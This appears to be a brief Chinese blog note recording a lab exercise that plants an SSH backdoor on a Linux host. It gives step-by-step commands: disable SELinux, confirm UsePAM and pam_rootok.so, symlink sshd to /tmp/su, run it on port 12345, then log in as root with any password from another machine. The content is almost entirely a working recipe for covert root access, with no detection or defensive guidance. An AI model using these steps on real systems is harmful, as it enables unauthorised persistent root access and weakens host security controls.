本文介绍了如何修改SELINUX配置,检查sshd_config中UsePAM参数,以及确认PAM配置文件是否存在安全隐患。接着,展示了创建SSH后门软链接的过程,并监听特定端口。最后,说明了如何通过另一台机器尝试使用该后门进行任意密码登录。这是一个关于系统安全和SSH漏洞利用的实践案例。
一、修改/etc/selinux/config文件中的SELINUX="" 为 disabled 。
二、判断sshd_config配置中的UsePAM参数是否为yes
cat /etc/ssh/sshd_config
三、确认对应的pam配置文件是否包含auth sufficient pam_rootok.so配置,只在包含这件配置才可以通过ssh任意密码登录。
四、通过命令创建后门软链接,通过查看端口己监听。
ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=12345
netstat -antlp
五、通过另一台机器ssh进行任意密码登录。
ssh root@192.168.137.130 -p 12345
本次实验通过学习安全小白团的文章而成功,本次只做一次简单笔记以便日后翻查。
原始链接如下:
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
